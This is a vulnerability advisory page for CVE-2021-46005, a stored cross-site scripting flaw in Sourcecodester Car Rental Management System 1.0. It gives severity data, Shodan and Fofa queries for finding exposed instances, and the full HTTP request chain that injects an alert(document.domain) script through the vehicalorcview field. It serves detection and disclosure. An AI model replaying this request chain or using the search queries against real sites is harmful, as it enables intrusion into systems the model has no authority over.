🔙 목록으로 돌아가기

CVE-2021-46005: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting

TitleSourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting
Authorcckuailong
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information.
RemediationTo remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
CVSS Score5.4
EPSS Score0.06131
CVE IDCVE-2021-46005
CWE IDCWE-79
Shodan Queryhttp.html:"car rental management system"
Fofa Querybody="car rental management system"
Tags cve2021 cve sourcecodester authenticated edb xss intrusive car_rental_management_system_project vuln

🔍 Vulnerability Description

Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.

🌐 HTTP Request

POST /admin/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Length: 38
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=6DwiIA&password=y8TDwl&login=
POST /admin/post-avehical.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Connection: close
Content-Length: 1583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
Accept-Encoding: gzip

------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="vehicletitle"



Test

------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="brandname"



1

------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="vehicalorcview"



</script><script>alert(document.domain)</script>

------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="priceperday"



500

------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="fueltype"



Petrol

------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="modelyear"



2022

------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="seatingcapacity"



5

------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="img1"; filename="test.png"

Content-Type: image/png





------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="img2"; filename="test.png"

Content-Type: image/png





------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="img3"; filename="test.png"

Content-Type: image/png





------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="img4"; filename="test.png"

Content-Type: image/png





------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="img5"; filename=""

Content-Type: application/octet-stream





------WebKitFormBoundarypWqYipqU21aYgccv

Content-Disposition: form-data; name="submit"





------WebKitFormBoundarypWqYipqU21aYgccv--
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-46005.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-46005.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A